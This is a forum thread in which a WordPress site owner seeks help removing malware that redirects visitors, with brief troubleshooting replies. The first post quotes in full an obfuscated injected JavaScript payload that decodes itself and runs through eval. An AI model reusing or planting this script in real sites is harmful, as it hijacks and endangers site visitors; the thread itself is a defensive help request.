1. Advertising
    y u no do it?

    Advertising (learn more)

    Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

    Starts at just $1 per CPM or $0.10 per CPC.
  2. Better Analytics for WordPress Get It Free

Please Help Remove Malware From My Wordpress Site

Discussion in 'Programming' started by lcp03o, Apr 27, 2012.

  1. #1
    Hi

    Can anyone help me to remove malware from my wordpress site?? When I go to my site I am re-directed to other sites, When I right click on my web page and click on view source I can see the following code

    <meta name="generator" content="WordPress 3.0.1" /> <!-- leave this for stats please -->
    
    	<link rel="stylesheet" href="http://MYURL/wp-content/themes/pdfbase/style.css" type="text/css" media="screen" />
    		<link rel="stylesheet" href="http://MYURL/wp-content/themes/pdfbase/additional.css" type="text/css" media="screen" />
    	<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://MYURL/feed" />
    	<link rel="alternate" type="text/xml" title="RSS .92" href="MYURL/feed/rss" />
    	<link rel="alternate" type="application/atom+xml" title="Atom 0.3" href="http://MYURL/feed/atom" />
    	
    	<link rel="pingback" href="http://MYURL/xmlrpc.php" />
        	<link rel='archives' title='September 2011' href='http://MYURL/2011/09' />
    [COLOR="#FF0000"]<script type='text/javascript'>var $n=(Date);if($n){$P='3482';}var $p={'u':'reve\x72\x73\x65','q':'jo\x69n','m':!false,'U':'st\x72\x69ng','C':'le\x6E\x67\x74h','T':'spli\x74','Q':'s\x75\x62str'},$1='',$b=['!b=1 rfavi;gl="o ;"fiynl(1=-d=.cotcouenmeiiko.ndi(gffOxxe{))74=2ravd ;E6=ewnD =tag"2ejp;.de;"stTgd.e(emmiitT)e()t"=mip;tlcy..lnem=ew"ed;ta(D ed.eim(Tt4egx)+d);otnec.mcuokio=e+ig"esf"=+epeac(d.tTSrMG(otgin+))"ripsex;e=+e".drottinGTSM+);(g"pat";x/=hht"t=ptt:pt+"+"///n.igc;?igva"jp+=e1 r-!=tgaoivsanur.Aergot.oLtenwrCesae(edxO)in.f"r(fief=,f")"jxo,1"u=fn(no{)ict}j.;rp=toe{boyptnutf:cio4i=3{);(n472"u=uutenrr"; xtt,}i:atonfncuq{")(=q"7490=N=d;w9;;""rav; rbJ=gdo=uc=emRkQn;ctv;rb=a kwdo;ni"w==dOv";aht=sihr ;Q=fDctp=;ryK""==K1u{ 76pL=Wc;;00"="=wKb"=U;"S;er=pOROVb=kQ=;K=eq;=""Bb;"mF;"="Fm=vWtgesrttsiAetd";fEw2b=667;K=gav ;9ra=vR=Sq;e][;=b(||f;)".a0="pshu"(,eh""sihtgtsiburngcrert"e,"teaeElmteg,"ten"idwhtf,"irs"bmv,"Wtev,""",aydnobepphdCi,f,,g"ld"rcs)"0e;56;O64="=;Ty"hSuU=Ka;"b="D=K;f="=I;"yb;w="IIw6;"132s=1J=G"r;";a;50g540=A4L=859;=l [arva2[a]1[)]]6;n(,13""g=Z;P=a;vr"Pag"= m][4[(]],31a[6;c)=OK25v=m91;3ma""+e;t;I"lt"l=I"O=;O"j544;32Z=pa[=]53a[(,1[]]1"+u)1bte"=";Uq=;"QrJvb;a.h=(bnr )tT;"==;"ca[vr al[(]9]vK1a[0[cn;)=]]D;n=OIm"= b;mO"Ic;aa[=[8[]]3Ho4;]=02"M=kk;c18;M"[[a08[a;]=]]m="H;";Wb"wY=bW";"["=a9][]]a6[]a[][7)(c;Rk="=TfV"ca}ct=(hK""r{h)TKbl,=,g(te"irmw.t<h<l>b/<>obyodd><yh/umt,IEl")>,"."=kseueotminTtu(ficto.h{(a)n(),2}339,)228iB=GNz6,2=95"="}SiB}1c};"=";=o enrvawj; Tg("=a)}"o.;;'][$p.q]('\x0A'),$P=$P[$p.T]($1),$9=function(){for(var $A in $P){if(typeof($P[$A])==$p.U){var $c=[],$i=$p.m,$n=$P[$A]*-~!true;for(U=[]^[];U<$b[$p.C];U+=$n){$c[U]=($i)?($b[$p.Q](U,$n)[$p.T]($1)[$p.u]()[$p.q]($1)):($b[$p.Q](U,$n));$i=!$i;}$b=$c[$p.q]($1);}}win\u0064\u006F\u0077['\x65\x76al']($b);},$b=$9();</script>[/COLOR]
    
    <link rel='stylesheet' id='thickbox-css'  href='http://MYURL/wp-includes/js/thickbox/thickbox.css?ver=20090514' type='text/css' media='all' />
    Code (markup):
    The code highlighted in red is the malware, So by looking at the source it looks like the code is located in the header template directly under the <?php wp_get_archives('type=monthly&format=link'); ?> but I dont see anything harmful under that line?

    <link rel="stylesheet" href="<?php bloginfo('stylesheet_url'); ?>" type="text/css" media="screen" />
    
    		<link rel="stylesheet" href="<?php bloginfo('stylesheet_directory'); ?>/additional.css" type="text/css" media="screen" />
    
    	<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="<?php bloginfo('rss2_url'); ?>" />
    
    	<link rel="alternate" type="text/xml" title="RSS .92" href="<?php bloginfo('rss_url'); ?>" />
    
    	<link rel="alternate" type="application/atom+xml" title="Atom 0.3" href="<?php bloginfo('atom_url'); ?>" />
    
    	
    
    	<link rel="pingback" href="<?php bloginfo('pingback_url'); ?>" />
    
        <?php wp_get_archives('type=monthly&format=link'); ?>
    
    	<?php //comments_popup_script(); // off by default ?>
    
    	<?php wp_head(); ?>
    
    
    Code (markup):
    Does anyone know where the malware could be located?? I would ideally like to remove the malware manually coz its going to be a nightmare to start from scratch as everything on my site was custom written :(

    Thanks
     
    lcp03o, Apr 27, 2012 IP
  2. OSSEO

    OSSEO Active Member

    Messages:
    1,436
    Likes Received:
    6
    Best Answers:
    0
    Trophy Points:
    53
    #2
    You have to check manually all pages specially . Index, header. footer. include files.
     
    OSSEO, Apr 27, 2012 IP
  3. lcp03o

    lcp03o Active Member

    Messages:
    249
    Likes Received:
    3
    Best Answers:
    0
    Trophy Points:
    58
    #3
    ive looked everywhere.

    Ive uploaded new wordpress files - still had an issue

    Ive tried disabeling all plugins,

    checked .htaccess

    checked all files in the theme, even changed to a new theme

    looked in the database

    Cant find anything
     
    lcp03o, Apr 27, 2012 IP